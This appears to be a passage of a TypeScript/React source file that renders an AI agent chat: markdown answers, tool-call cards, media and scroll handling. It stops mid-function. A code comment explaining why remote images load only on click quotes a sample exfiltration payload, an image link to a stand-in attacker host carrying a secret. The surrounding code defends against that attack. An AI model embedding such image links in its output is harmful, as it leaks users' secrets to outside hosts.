import { PROVIDERS, splitMemoryBlocks, type ChatAttachment, type ChatEvent, type MemoryBlock, type RunStartedPayload } from "@codvero/shared";
import { AgentAvatar } from "@/ui/AgentAvatar.tsx";
import { ProviderIcon } from "@/ui/ProviderIcon.tsx";
import { ArrowDown } from "lucide-react";
import { GitFork, Paperclip, RotateCcw } from "lucide-react";
import { filesApi } from "@/api/browser.ts";
import { Brain, ChevronDown, Wrench } from "lucide-react";
import { createContext, useContext, useEffect, useRef, useState, type ComponentProps, type ReactNode } from "react";
import Markdown, { defaultUrlTransform } from "react-markdown";
import { useTranslation } from "react-i18next";
import remarkGfm from "remark-gfm";
import { cn } from "@/lib/cn.ts";
import type { TeamTask } from "@codvero/shared";
import { TaskCard } from "./TaskCard.tsx";
import { useImageViewer } from "@/ui/ImageViewer.tsx";
import { mediaKindOfUrl, mediaOf, textOf, type FilesSavedPayload, type ToolMedia } from "@codvero/shared";
import { FilePreview, IMAGE_FILE, LOCAL_FILE, SavedFiles } from "./FilePreview.tsx";
import { blockDir, type HastLike } from "@/lib/bidi.ts";
import { useQuery } from "@tanstack/react-query";
import { projectsApi } from "@/api/projects.ts";
import { useAuthStatus } from "@/features/auth/session.ts";
import { UserAvatar } from "@/ui/UserAvatar.tsx";
import type { PluggableList } from "unified";
import remarkBreaks from "remark-breaks";
import remarkMath from "remark-math";
import { BareLink, CopyAnswer, ExternalMark, MathTex, MdCell, MdCode, MdPre, MdQuote, MdTable } from "./markdown/blocks.tsx";
import { hastText, isBareLink, rehypeNumericColumns, remarkCallouts } from "./markdown/md.ts";

type Block = { type: "text"; text: string } | { type: "tool_use"; id: string; name: string; input: unknown } | { type: "tool_result"; tool_use_id: string; content: unknown; is_error?: boolean } | { type: "thinking"; thinking: string };

function blocksOf(payload: unknown): Block[] {
  const m = (payload as { message?: { content?: unknown } }).message;
  const c = m?.content;
  if (typeof c === "string") return [{ type: "text", text: c }];
  return Array.isArray(c) ? (c as Block[]) : [];
}

/** The project whose workspace the conversation's files live in (for paths an agent writes in its answer), and
 *  opening one of them over the page. */
const WorkspaceCtx = createContext<{ projectId: string | null; open: (path: string) => void }>({ projectId: null, open: () => {} });
/** A file the agent names by its place in the container (/workspace/…, Antigravity's artifacts), served from there. */
function useWorkspaceUrl() {
  const { projectId } = useContext(WorkspaceCtx);
  return (src: string, download = false): string => (projectId && LOCAL_FILE.test(src) ? filesApi.rawUrl(projectId, src, download) : src);
}
/** Links in answers: file:// links to the container (Antigravity writes file:///workspace/…) become plain paths;
 *  everything else goes through react-markdown's own check (no javascript: and the like). */
function mdUrl(url: string): string {
  const m = /^file:\/\/(\/[^?#]*)/i.exec(url);
  if (m) { try { return decodeURI(m[1]!); } catch { return m[1]!; } }
  return defaultUrlTransform(url);
}

/** Agent output is untrusted: links open in a new tab, and remote images load only when clicked, because an image
 *  URL can carry data out (e.g. ![](https://attacker/?q=<secret>)) without any click. */
type MdProps = { node?: HastLike | undefined; children?: ReactNode; className?: string | undefined };
const dirOf = (node: HastLike | undefined) => blockDir(node) ?? "auto";
/** A paragraph of nothing but images (two or more) is laid out as a gallery. */
const isGallery = (node: HastLike | undefined) => {
  const kids = node?.children ?? [];
  return kids.filter((c) => c.tagName === "img").length > 1 && kids.every((c) => c.tagName === "img" || c.tagName === "br" || (c.type === "text" && !c.value?.trim()));
};
const MD_COMPONENTS = {
  // Mixed Arabic/English: every block takes the direction of the script that carries it (blockDir), so an Arabic line
  // that opens with `code` or an English name stays RTL, and an English paragraph doesn't inherit the page's RTL.
  p: ({ node, children }: MdProps) => {
    if (isGallery(node)) return <div className="md-gallery">{children}</div>;
    // a formula alone on its line ($$…$$) is set as display maths
    const only = node?.children?.length === 1 ? (node.children[0] as HastLike & { properties?: { className?: unknown } }) : undefined;
    if (only?.tagName === "code" && String(only.properties?.className ?? "").includes("math-inline")) return <MathTex tex={hastText(only)} display />;
    return <p dir={dirOf(node)}>{children}</p>;
  },
  li: ({ node, children, className }: MdProps) => <li dir={dirOf(node)} className={className}>{children}</li>,
  // numbers are drawn by app.css from a counter; a list that starts later (3. 4. …) carries on from its start
  ol: ({ node, children, className, start }: MdProps & { start?: number | undefined }) => <ol dir={dirOf(node)} className={className} style={start && start !== 1 ? { counterReset: `md-ol ${start - 1}` } : undefined}>{children}</ol>,
  ul: ({ node, children, className }: MdProps) => <ul dir={dirOf(node)} className={className}>{children}</ul>,
  h1: ({ node, children }: MdProps) => <h1 dir={dirOf(node)}>{children}</h1>,
  h2: ({ node, children }: MdProps) => <h2 dir={dirOf(node)}>{children}</h2>,
  h3: ({ node, children }: MdProps) => <h3 dir={dirOf(node)}>{children}</h3>,
  h4: ({ node, children }: MdProps) => <h4 dir={dirOf(node)}>{children}</h4>,
  blockquote: MdQuote,
  table: MdTable,
  th: (props: ComponentProps<"th"> & { node?: HastLike | undefined }) => <MdCell as="th" {...props} />,
  td: (props: ComponentProps<"td"> & { node?: HastLike | undefined }) => <MdCell as="td" {...props} />,
  pre: MdPre,
  code: MdCode,
  a: MdLink,
  img: MdMedia,
};
const REMARK = [remarkGfm, remarkBreaks, [remarkMath, { singleDollarTextMath: false }], remarkCallouts] as PluggableList;
const REHYPE = [rehypeNumericColumns] as PluggableList;

function MdLink({ node, href, children }: { node?: HastLike | undefined; href?: string | undefined; children?: ReactNode }) {
  const ws = useWorkspaceUrl();
  const { projectId, open } = useContext(WorkspaceCtx);
  const local = !!href && !!projectId && LOCAL_FILE.test(href);
  const kind = href && (local || /^https?:\/\//i.test(href)) ? mediaKindOfUrl(href) : null;
  const external = !local && !!href && /^https?:\/\//i.test(href);
  // a file in the container opens over the page (a new tab only flashed for files the platform serves as downloads)
  const out = (body: ReactNode, className?: string) => <a href={href ? ws(href) : href} target="_blank" rel="noopener noreferrer" className={className || undefined} title={href}>{body}</a>;
  const link = local && kind !== "video" && kind !== "audio"
    ? <a href={ws(href!)} onClick={(e) => { if (e.metaKey || e.ctrlKey) return; e.preventDefault(); open(href!); }}>{children}</a>
    : external && isBareLink(href, hastText(node))
      ? <BareLink href={href!} anchor={out} />
      : out(external ? <>{children}<ExternalMark /></> : children);
  // a link to a video or a sound plays in place (and stays a link for downloading)
  if (href && (kind === "video" || kind === "audio")) return <>{link}<MediaPlayer media={{ kind, src: ws(href), name: "", remote: !local }} /></>;
  return link;
}

function MdMedia({ src, alt }: { src?: string | Blob | undefined; alt?: string | undefined }) {
  const ws = useWorkspaceUrl();
  const raw = typeof src === "string" ? src : "";
  const url = ws(raw);
  const kind = IMAGE_FILE.test(raw.split(/[?#]/)[0]!) ? "image" : mediaKindOfUrl(raw);
  if (kind === "video" || kind === "audio") return <MediaPlayer media={{ kind, src: url, name: alt ?? "", remote: url === raw && /^https?:/i.test(raw) }} />;
  return <MdImage src={url} alt={alt ?? ""} />;
}

function MdImage({ src, alt }: { src: string; alt: string }) {
  const viewImages = useImageViewer();
  const [show, setShow] = useState(false);
  let local = false;
  try { local = src.startsWith("data:image/") || new URL(src, window.location.href).origin === window.location.origin; } catch { local = false; }
  if (!src) return null;
  if (local || show) {
    // an image from the workspace (or one let through) opens in the viewer, like the tools' images
    const name = alt || decodeURIComponent(src.split(/[?#]/)[0]!.split("/").pop() ?? "") || "image.png";
    // a written description under the image (not a file name)
    const caption = alt && !/^[\w.-]+\.\w{2,5}$/.test(alt) && alt !== "image" ? alt : "";
    // in a gallery the viewer pages through all of its images
    const onOpen = (e: React.MouseEvent<HTMLButtonElement>) => {
      const imgs = [...(e.currentTarget.closest(".md-gallery")?.querySelectorAll<HTMLImageElement>("img.md-img") ?? [])];
      if (imgs.length > 1) viewImages(imgs.map((i) => ({ src: i.src, name: i.alt || "image.png" })), imgs.findIndex((i) => i.src === e.currentTarget.querySelector("img")?.src));
      else viewImages([{ src, name }]);
    };
    return (
      <span className="md-figure">
        <button type="button" className="block cursor-zoom-in" onClick={onOpen}>
          {/* an SVG without its own size would shrink to nothing in a bubble that sizes to its content */}
          <img src={src} alt={alt} loading="lazy" className={cn("md-img max-h-96 max-w-full rounded-md border border-border", /\.svg($|[?&#])|%2Esvg|\.svg%/i.test(src) && "w-72 bg-white/90")} />
        </button>
        {caption && <span dir="auto" className="md-caption">{caption}</span>}
      </span>
    );
  }
  let host = src;
  try { host = new URL(src).host; } catch { /* keep */ }
  return (
    <button type="button" onClick={() => setShow(true)} className="my-1 inline-flex items-center gap-1 rounded-md border border-border bg-surface-2 px-2 py-1 text-xs text-fg-muted hover:text-fg" title={src}>
      🖼 {alt || "image"} · <span dir="ltr">{host}</span>
    </button>
  );
}

/** A video or a sound from an answer or a tool. A remote one fetches nothing until it is played. */
function MediaPlayer({ media }: { media: ToolMedia }) {
  const preload = media.remote ? "none" : "metadata";
  if (media.kind === "audio") return <audio controls preload={preload} src={media.src} className="my-2 w-full max-w-md" />;
  return <video controls playsInline preload={preload} src={media.src} className="my-2 max-h-96 max-w-full rounded-md border border-border bg-black" />;
}

/** What a tool brought back to look at (a provider's carousel slides, a generated video): shown in the conversation
 *  without opening the tool's details. Images open in the viewer; videos and sounds play in place. */
function MediaStrip({ media }: { media: ToolMedia[] }) {
  const viewImages = useImageViewer();
  const images = media.filter((m) => m.kind === "image");
  const shown = (m: ToolMedia) => !m.remote || m.kind !== "image";
  return (
    <div className="flex flex-wrap items-start gap-2 border-t border-border p-2">
      {images.map((m, i) =>
        shown(m) ? (
          <button key={m.src.slice(0, 120) + i} type="button" className="block cursor-zoom-in" onClick={() => viewImages(images.filter(shown).map((x) => ({ src: x.src, name: x.name })), images.filter(shown).indexOf(m))}>
            <img src={m.src} alt={m.name} loading="lazy" className="max-h-56 max-w-[min(100%,20rem)] rounded border border-border" />
          </button>
        ) : (
          <MdImage key={m.src} src={m.src} alt={m.name} />
        ),
      )}
      {media.filter((m) => m.kind !== "image").map((m) => <MediaPlayer key={m.src.slice(0, 120)} media={m} />)}
    </div>
  );
}

/** Folds long content (≈8 lines) behind a "show more" toggle; short content is untouched. */
function Folding({ children }: { children: ReactNode }) {
  const { t } = useTranslation();
  const ref = useRef<HTMLDivElement>(null);
  const [tall, setTall] = useState(false);
  const [open, setOpen] = useState(false);
  useEffect(() => {
    const el = ref.current;
    if (!el) return;
    const check = () => setTall(el.scrollHeight > 240);
    check();
    const ro = new ResizeObserver(check);
    ro.observe(el);
    return () => ro.disconnect();
  }, []);
  return (
    <div>
      <div ref={ref} className={cn("relative", tall && !open && "max-h-56 overflow-hidden [mask-image:linear-gradient(to_bottom,black_70%,transparent)]")}>{children}</div>
      {tall && <button type="button" className="tap mt-1 text-xs font-medium text-accent hover:underline" onClick={(e) => { e.stopPropagation(); setOpen(!open); }}>{open ? t("chat.showLess") : t("chat.showMore")}</button>}
    </div>
  );
}

/** Markdown as the chat shows it (answers and the user's own messages): typography, tables, code, maths, diagrams
 *  and callouts are styled in app.css (.prose-chat) and ./markdown/blocks.tsx. Every line break the writer typed is
 *  kept. An answer can carry a copy button. */
/** The message the page's address points at (a file's place in the conversation), if any. */
const focusTarget = () => (typeof location !== "undefined" && /^#(turn|seg)-[\w-]+$/.test(location.hash) ? location.hash.slice(1) : null);
// a few seconds after it is shown, replies still loading (a multi chat's other providers) don't pull the page down
let focusHoldUntil = 0;
const holdingFocus = () => !!focusTarget() || Date.now() < focusHoldUntil;

/** The direction of a whole message, from its prose (code blocks don't count): an Arabic answer is laid out exactly
 *  as on the Arabic interface even when the interface is in English, lists and all (Safari spaces the bullets of an
 *  RTL item inside an LTR list differently). */
const textDir = (text: string) => blockDir({ type: "root", children: [{ type: "text", value: text.replace(/```[\s\S]*?(```|$)/g, " ").replace(/`[^`\n]*`/g, " ") }] }) ?? "auto";

export function Md({ text, copyable = false }: { text: string; copyable?: boolean }) {
  const ref = useRef<HTMLDivElement>(null);
  return (
    <div className="group/answer min-w-0">
      <div ref={ref} className="prose-chat" dir={textDir(text)}>
        <Markdown remarkPlugins={REMARK} rehypePlugins={REHYPE} components={MD_COMPONENTS} urlTransform={mdUrl}>{text}</Markdown>
      </div>
      {copyable && <CopyAnswer target={ref} markdown={text} />}
    </div>
  );
}

function Bubble({ side, children, tone }: { side: "user" | "agent"; children: ReactNode; tone?: "muted" | "danger" | "warn" }) {
  return (
    <div className={cn("flex", side === "user" ? "justify-start" : "justify-end", "sm:justify-start")}>
      <div className={cn("min-w-0 max-w-full rounded-lg px-4 py-2 sm:max-w-[85%]", side === "user" ? "bg-accent-soft" : "bg-surface border border-border", tone === "danger" && "border-danger/40 bg-danger-soft text-danger", tone === "warn" && "border-warn/50 bg-warn-soft text-warn", tone === "muted" && "text-fg-muted")}>{children}</div>
    </div>
  );
}

type ToolResult = { content: unknown; is_error?: boolean | undefined };

function ToolCall({ name, input, result, live = true }: { name: string; input: unknown; result: ToolResult | undefined; live?: boolean }) {
  const viewImages = useImageViewer();
  const isBrowser = name.startsWith("mcp__browser__");
  const [open, setOpen] = useState(isBrowser && name.endsWith("screenshot"));
  const summary = summarizeInput(name, input);
  // browser screenshots stay in the tool's details; other tools' media is shown under the card (StepsCard)
  const images = result && isBrowser ? mediaOf(result.content).filter((m) => m.kind === "image" && !m.remote) : [];
  const out = result ? textOf(result.content) : null;
  return (
    <div className={cn("my-1 rounded-md border text-xs", result?.is_error ? "border-danger/40" : "border-border")}>
      <button type="button" onClick={() => setOpen(!open)} className="flex w-full items-center gap-2 px-3 py-1.5 text-start hover:bg-surface-2">
        <Wrench className="size-3.5 shrink-0 text-fg-muted" />
        <span className="font-medium">{isBrowser ? `🌐 ${name.replace("mcp__browser__", "")}` : name}</span>
        <span dir="ltr" className="min-w-0 flex-1 truncate font-mono text-fg-muted">{summary}</span>
        {result ? <span className={cn("shrink-0", result.is_error ? "text-danger" : "text-success")}>●</span> : <span className={cn("shrink-0", live ? "animate-pulse text-warn" : "text-fg-muted")}>●</span>}
        <ChevronDown className={cn("size-3.5 shrink-0 transition-transform", open && "rotate-180")} />
      </button>
      {open && (
        <div dir="ltr" className="space-y-2 border-t border-border p-2 text-start">
          <pre className="max-h-48 overflow-auto rounded bg-surface-2 p-2 font-mono">{JSON.stringify(input, null, 2)}</pre>
          {images.map((im, i) => (
            <button key={i} type="button" className="block cursor-zoom-in" onClick={() => viewImages(images.map((x, j) => ({ src: x.src, name: `screenshot-${j + 1}.${x.name.split(".").pop() ?? "png"}` })), i)}>
              <img src={im.src} alt="screenshot" className="max-h-96 rounded border border-border" />
            </button>
          ))}
          {out !== null && out.trim() !== "" && <pre className="max-h-64 overflow-auto rounded bg-surface-2 p-2 font-mono whitespace-pre-wrap">{out.slice(0, 20_000)}</pre>}
        </div>
      )}
    </div>
  );
}

function summarizeInput(name: string, input: unknown): string {
  const i = (input ?? {}) as Record<string, unknown>;
  const pick = i.command ?? i.file_path ?? i.path ?? i.pattern ?? i.query ?? i.url ?? i.description ?? "";
  return typeof pick === "string" ? pick : JSON.stringify(i).slice(0, 120);
}

/** A run of tool calls and thinking shown as one card: collapsed, its header tells how many steps and what the
 *  latest one is (live while it runs); opened, it lists every step as before. */
function StepsCard({ steps, results, live, keptRuns }: { steps: ({ kind: "tool"; id: string; name: string; input: unknown; runId?: string | null } | { kind: "thinking"; key: string; text: string })[]; results: Map<string, ToolResult>; live: boolean; keptRuns: Set<string | null> }) {
  const { t } = useTranslation();
  const [open, setOpen] = useState(false);
  const tools = steps.filter((s): s is Extract<typeof s, { kind: "tool" }> => s.kind === "tool");
  const thoughts = steps.length - tools.length;
  const pending = live && tools.some((s) => !results.has(s.id));
  const failed = tools.filter((s) => results.get(s.id)?.is_error).length;
  const last = tools.at(-1);
  // images, videos and sounds the tools returned (not the browser's own screenshots), visible while folded
  // an MCP tool's files the platform kept are shown from there (the "kept" card), not a second time here
  const media = tools.filter((s) => !s.name.startsWith("mcp__browser__") && !(s.name.startsWith("mcp__") && keptRuns.has(s.runId ?? null))).flatMap((s) => {
    const r = results.get(s.id);
    const found = r && !r.is_error ? mediaOf(r.content) : [];
    // one file read by path (e.g. outputs/…/s1.png): downloads keep its name
    const path = (s.input as { path?: unknown; file_path?: unknown } | null)?.path ?? (s.input as { file_path?: unknown } | null)?.file_path;
    return found.length === 1 && typeof path === "string" ? [{ ...found[0]!, name: path.split("/").pop() || found[0]!.name }] : found;
  });
  // a single thought is shown as before: a card for one line would only add a click
  if (tools.length === 0 && thoughts === 1) {
    const th = steps[0] as Extract<(typeof steps)[number], { kind: "thinking" }>;
    return <details className="text-xs text-fg-muted"><summary className="cursor-pointer">{t("chat.thinking")}</summary><div className="whitespace-pre-wrap">{th.text}</div></details>;
  }
  return (
    <div className={cn("min-w-0 max-w-full overflow-hidden rounded-lg border bg-surface/40 text-xs", failed ? "border-danger/40" : "border-border")}>
      <button type="button" onClick={() => setOpen(!open)} aria-expanded={open} className="flex w-full items-center gap-2 px-3 py-2 text-start hover:bg-surface-2">
        <Wrench className="size-3.5 shrink-0 text-fg-muted" />
        <span className="shrink-0 font-medium">
          {tools.length > 0 && t("chat.stepsTools", { count: tools.length })}
          {tools.length > 0 && thoughts > 0 && " · "}
          {thoughts > 0 && t("chat.stepsThinking", { count: thoughts })}
        </span>
        {last && !open && <span dir="ltr" className="min-w-0 flex-1 truncate font-mono text-fg-muted">{last.name.replace("mcp__browser__", "🌐 ")} {summarizeInput(last.name, last.input)}</span>}
        {(!last || open) && <span className="flex-1" />}
        {failed > 0 && <span className="shrink-0 text-danger">{t("chat.stepsFailed", { count: failed })}</span>}
        {pending ? <span className="shrink-0 animate-pulse text-warn">●</span> : tools.length > 0 && <span className={cn("shrink-0", failed ? "text-danger" : tools.every((x) => results.has(x.id)) ? "text-success" : "text-fg-muted")}>●</span>}
        <ChevronDown className={cn("size-3.5 shrink-0 transition-transform", open && "rotate-180")} />
      </button>
      {media.length > 0 && <MediaStrip media={media} />}
      {open && (
        <div className="space-y-1 border-t border-border p-2">
          {steps.map((st) => st.kind === "tool"
            ? <ToolCall key={st.id} name={st.name} input={st.input} result={results.get(st.id)} live={live} />
            : <details key={st.key} className="my-1 text-fg-muted"><summary className="cursor-pointer">{t("chat.thinking")}</summary><div className="whitespace-pre-wrap">{st.text}</div></details>)}
        </div>
      )}
    </div>
  );
}

export interface PromptActions {
  onRewind: (seq: number) => void;
  onFork: (seq: number) => void;
}

/** Under an answer: what it asked the platform to remember, and in which memory. */
function MemoryKept({ blocks }: { blocks: MemoryBlock[] }) {
  const { t } = useTranslation();
  const layers = [...new Set(blocks.map((b) => b.layer))];
  const lines = blocks.flatMap((b) => b.lines);
  return (
    <details className="group ms-1 w-fit max-w-full text-[11px] text-fg-muted">
      <summary className="flex cursor-pointer list-none items-center gap-1.5 rounded-full border border-border px-2 py-0.5 hover:text-fg">
        <Brain className="size-3 text-accent" /> {t("memoryKept.saved", { where: layers.map((l) => t(`memoryKept.layer.${l}`)).join(" · ") })}
      </summary>
      <ul dir="auto" className="mt-1 list-disc space-y-0.5 ps-5">{lines.map((l, i) => <li key={i}>{l}</li>)}</ul>
    </details>
  );
}

export function MessageList({ events, partial, running, canEdit = false, projectId, actions }: { events: ChatEvent[]; partial: string; running: boolean; canEdit?: boolean; projectId?: string; actions?: PromptActions }) {
  const { t, i18n } = useTranslation();
  const viewImages = useImageViewer();
  const [preview, setPreview] = useState<string | null>(null);
  const endRef = useRef<HTMLDivElement>(null);
  // opened at one message (#turn-<seq>, #seg-<chat>-<seq>: a file's place, from a space's files): no pinning to the end
  const atBottom = useRef(!holdingFocus());
  const [unseen, setUnseen] = useState(false);
  const scrollerOf = () => endRef.current?.closest<HTMLElement>("[data-chat-scroll]") ?? null;
  const toBottom = (behavior: ScrollBehavior = "auto") => { const sc = scrollerOf(); if (sc) sc.scrollTo({ top: sc.scrollHeight, behavior }); };
  // Follow new output only while the reader is at the bottom; otherwise offer a "jump down" arrow (like Claude Code).
  // Opening a chat lands on the latest message: while pinned, any growth of the content (history replay, markdown,
  // images, expanding tool cards) re-pins the scroller to the bottom instead of leaving it mid-way or at the top.
  // Only the reader can leave the bottom: a scroll that follows a wheel, touch or key is theirs; any other scroll
  // (heights changing while history, markdown, images or folded text settle) keeps the chat pinned to the latest
  // message. Before, such layout scrolls could unpin it and the chat opened somewhere in the middle.
  useEffect(() => {
    const scroller = scrollerOf();
    if (!scroller) return;
    let lastGesture = 0;
    const gesture = () => { lastGesture = Date.now(); };
    const onScroll = () => {
      const near = scroller.scrollHeight - scroller.scrollTop - scroller.clientHeight < 48;
      if (near) { atBottom.current = true; setUnseen(false); return; }
      if (Date.now() - lastGesture < 1200) atBottom.current = false;
      else if (atBottom.current) scroller.scrollTop = scroller.scrollHeight;
    };
    const opts = { passive: true } as const;
    scroller.addEventListener("scroll", onScroll, opts);
    for (const ev of ["wheel", "touchstart", "touchmove", "keydown", "pointerdown"] as const) scroller.addEventListener(ev, gesture, opts);
    const ro = new ResizeObserver(() => { if (atBottom.current) scroller.scrollTop = scroller.scrollHeight; });
    const observeAll = () => { for (const child of Array.from(scroller.querySelectorAll(":scope > *, :scope > * > *"))) ro.observe(child); };
    observeAll();
    ro.observe(scroller);
    const mo = new MutationObserver(observeAll); // new message rows are observed as they appear
    mo.observe(scroller, { childList: true, subtree: false });
    if (!holdingFocus()) toBottom();
    return () => {
      scroller.removeEventListener("scroll", onScroll);
      for (const ev of ["wheel", "touchstart", "touchmove", "keydown", "pointerdown"] as const) scroller.removeEventListener(ev, gesture);
      ro.disconnect();
      mo.disconnect();
    };
  }, []);
  useEffect(() => {
    if (atBottom.current) toBottom();
    else setUnseen(true);
  }, [events.length, partial]);
  // the message the address points at: brought into view (again once the content above has settled) and flashed
  useEffect(() => {
    const id = focusTarget();
    const el = id ? document.getElementById(id) : null;
    if (!el) return;
    el.scrollIntoView({ block: "start" });
    el.classList.add("focus-flash");
    focusHoldUntil = Date.now() + 5000;
    history.replaceState(history.state, "", location.pathname + location.search);
    const again = setTimeout(() => el.scrollIntoView({ block: "start", behavior: "smooth" }), 400);
    const done = setTimeout(() => el.classList.remove("focus-flash"), 2600);
    return () => { clearTimeout(again); clearTimeout(done); };
  }, [events.length]);
  const jump = () => { toBottom("smooth"); setUnseen(false); };
  // who wrote a prompt: its sender (recorded since prompts carry userId), from the project's members; prompts from
  // before then are the reader's own when the project has no one else
  const me = useAuthStatus().data?.user ?? null;
  const members = useQuery({ queryKey: ["projects", projectId, "members"], queryFn: () => projectsApi.members(projectId!), enabled: !!projectId, staleTime: 60_000 }).data;
  const authorOf = (userId: string | undefined): { name: string; avatar: string | null } | null => {
    if (userId) {
      if (me && userId === me.id) return me;
      const m = members?.find((x) => x.userId === userId);
      return m ? { name: m.name, avatar: m.avatar } : null;
    }
    return me && (!members || members.length <= 1) ? me : null;
  };
  const senderOf = (p: RunStartedPayload) => (p.agent ? <AgentAvatar avatar={p.agent.avatar} size="sm" /> : <ProviderIcon provider={p.provider} size="md" />);

  // Pair tool results with their tool calls.
  const results = new Map<string, ToolResult>();
  for (const ev of events) {
    if (ev.type !== "provider") continue;
    const p = ev.payload as { type?: string };
    if (p.type === "user") for (const b of blocksOf(ev.payload)) if (b.type === "tool_result") results.set(b.tool_use_id, { content: b.content, is_error: b.is_error });
  }
  // A task appears where it was first announced; later task events only update its state.
  const latestTask = new Map<string, TeamTask>();
  const firstSeq = new Map<string, number>();
  for (const ev of events) if (ev.type === "task") { const tk = ev.payload as TeamTask; latestTask.set(tk.id, tk); if (!firstSeq.has(tk.id)) firstSeq.set(tk.id, ev.seq); }
  const fmtCost = (c: number | null) => (c === null ? "" : new Intl.NumberFormat(i18n.language, { style: "currency", currency: "USD", maximumFractionDigits: 4 }).format(c));

  // Flatten the agent's messages: written text stays a message; consecutive tool calls and thinking (across several
  // provider messages) are gathered into one collapsible card, so a long run reads as the conversation.
  type Step = { kind: "tool"; id: string; name: string; input: unknown; runId: string | null } | { kind: "thinking"; key: string; text: string };
  const keptRuns = new Set(events.filter((e) => e.type === "files_saved").map((e) => e.runId));
  // error results of a run that later finished: the provider recovered (retries, transient failures)
  const recovered = new Set<number>();
  {
    const failed = new Map<string, number[]>();
    for (const e of events) {
      const r = e.payload as { type?: string; is_error?: boolean };
      if (e.type !== "provider" || r.type !== "result" || !e.runId) continue;
      if (r.is_error) failed.set(e.runId, [...(failed.get(e.runId) ?? []), e.seq]);
      else for (const s of failed.get(e.runId) ?? []) recovered.add(s);
    }
  }
  type Item = { kind: "event"; ev: ChatEvent } | { kind: "text"; key: string; text: string; kept: MemoryBlock[] } | { kind: "steps"; key: string; steps: Step[] };
  const items: Item[] = [];
  let group: Extract<Item, { kind: "steps" }> | null = null;
  for (const ev of events) {
    if (ev.type === "provider") {
      const p = ev.payload as { type?: string; is_error?: boolean };
      if (p.type === "assistant") {
        blocksOf(ev.payload).forEach((b, i) => {
          if (b.type === "text") {
            // what the provider asked the platform to remember is kept, not shown: a note under the answer says where
            const { text, blocks: kept } = splitMemoryBlocks(b.text);
            if (text.trim() || kept.length) { group = null; items.push({ kind: "text", key: `${ev.seq}-${i}`, text, kept }); }
          }
          else if (b.type === "tool_use" || b.type === "thinking") {
            if (!group) { group = { kind: "steps", key: `${ev.seq}-${i}`, steps: [] }; items.push(group); }
            group.steps.push(b.type === "tool_use" ? { kind: "tool", id: b.id, name: b.name, input: b.input, runId: ev.runId } : { kind: "thinking", key: `${ev.seq}-${i}`, text: b.thinking });
          }
        });
        continue;
      }
      if (!(p.type === "result" && p.is_error) && p.type !== "notice") continue; // tool results pair with their calls; other provider lines are not shown
    }
    group = null;
    items.push({ kind: "event", ev });
  }

  // only the newest card of a run in progress can still be working; a step without a result after that just ended
  const lastSteps = [...items].reverse().find((x) => x.kind === "steps");

  return (
    <WorkspaceCtx.Provider value={{ projectId: projectId ?? null, open: setPreview }}>
    {preview && projectId && <FilePreview projectId={projectId} path={preview} onClose={() => setPreview(null)} />}
    <div className="space-y-3">
      {items.map((it) => {
        if (it.kind === "text") return (
          <div key={it.key} className="space-y-1">
            {it.text.trim() && <Bubble side="agent"><Md text={it.text} copyable /></Bubble>}
            {it.kept.length > 0 && <MemoryKept blocks={it.kept} />}
          </div>
        );
        if (it.kind === "steps") return <StepsCard key={it.key} steps={it.steps} results={results} live={running && it === lastSteps} keptRuns={keptRuns} />;
        const ev = it.ev;
        if (ev.type === "user_prompt") {
          const p = ev.payload as { text: string; attachments?: ChatAttachment[]; userId?: string };
          const author = authorOf(p.userId);
          return (
            // tabIndex: tapping a message on a touch screen focuses it and reveals its actions (no hover there)
            <div key={ev.seq} id={`turn-${ev.seq}`} tabIndex={-1} className="group/prompt relative scroll-mt-4 rounded-lg outline-none">
              {actions && canEdit && !running && (
                <div className="invisible absolute -top-2 end-0 z-10 flex gap-1 rounded-md border border-border bg-surface p-0.5 shadow-sm group-hover/prompt:visible group-focus-within/prompt:visible">
                  <button type="button" className="flex items-center gap-1 rounded px-1.5 py-0.5 text-[11px] text-fg-muted hover:bg-surface-2 hover:text-fg" title={t("chat.rewindHint")} onClick={() => actions.onRewind(ev.seq)}><RotateCcw className="size-3" /> {t("chat.rewind")}</button>
                  <button type="button" className="flex items-center gap-1 rounded px-1.5 py-0.5 text-[11px] text-fg-muted hover:bg-surface-2 hover:text-fg" title={t("chat.forkHint")} onClick={() => actions.onFork(ev.seq)}><GitFork className="size-3" /> {t("chat.fork")}</button>
                </div>
              )}
            {author && (
              <div className="flex items-center gap-2 pb-1">
                <UserAvatar name={author.name} image={author.avatar} size="sm" />
                <span dir="auto" className="text-sm font-medium">{author.name}</span>
              </div>
            )}
            <Bubble side="user">
              <Folding><Md text={p.text} /></Folding>
              {p.attachments && p.attachments.length > 0 && (
                <ul className="mt-2 flex flex-wrap gap-1.5">
                  {p.attachments.map((a) => (
                    <li key={a.path}>
                      {a.mime.startsWith("image/") && projectId ? (
                        <button type="button" className="block cursor-zoom-in rounded-md" aria-label={a.name} onClick={() => { const imgs = (p.attachments ?? []).filter((x) => x.mime.startsWith("image/")); viewImages(imgs.map((x) => ({ src: filesApi.rawUrl(projectId, x.path), name: x.name, downloadUrl: filesApi.rawUrl(projectId, x.path, true) })), imgs.findIndex((x) => x.path === a.path)); }}>
                          <img src={filesApi.rawUrl(projectId, a.path)} alt={a.name} className="max-h-40 max-w-60 rounded-md border border-border object-cover" />
                        </button>
                      ) : (
                        <a href={projectId ? filesApi.rawUrl(projectId, a.path, true) : undefined} className="flex items-center gap-1 rounded-md border border-border bg-surface-2 px-2 py-1 text-xs" dir="ltr"><Paperclip className="size-3" /> {a.name}</a>
                      )}
                    </li>
                  ))}
                </ul>
              )}
            </Bubble>
            </div>
          );
        }
        if (ev.type === "task") {
          const tk = ev.payload as TeamTask;
          if (firstSeq.get(tk.id) !== ev.seq) return null;
          return <TaskCard key={ev.seq} task={latestTask.get(tk.id) ?? tk} canEdit={canEdit} />;
        }
        if (ev.type === "run_started") {
          const p = ev.payload as Partial<RunStartedPayload> & { agent?: unknown };
          if (!p.provider) return null; // older runs carried no speaker info
          const rs = p as RunStartedPayload;
          const name = rs.agent ? rs.agent.name : PROVIDERS[rs.provider]?.label ?? rs.provider;
          return (
            <div key={ev.seq} className="flex items-center gap-2 pt-2">
              {senderOf(rs)}
              <span className="text-sm font-medium">{name}</span>
              {rs.agent && <span dir="ltr" className="font-mono text-[11px] text-fg-muted">@{rs.agent.handle}</span>}
              <span className="text-[11px] text-fg-muted">· {rs.agent ? PROVIDERS[rs.provider]?.label : rs.account?.label}{rs.model !== "default" ? ` · ${rs.model}` : ""}</span>
            </div>
          );
        }
        if (ev.type === "files_saved") return projectId ? <SavedFiles key={ev.seq} projectId={projectId} payload={ev.payload as FilesSavedPayload} /> : null;
        if (ev.type === "run_finished") {
          const p = ev.payload as { costUsd: number | null };
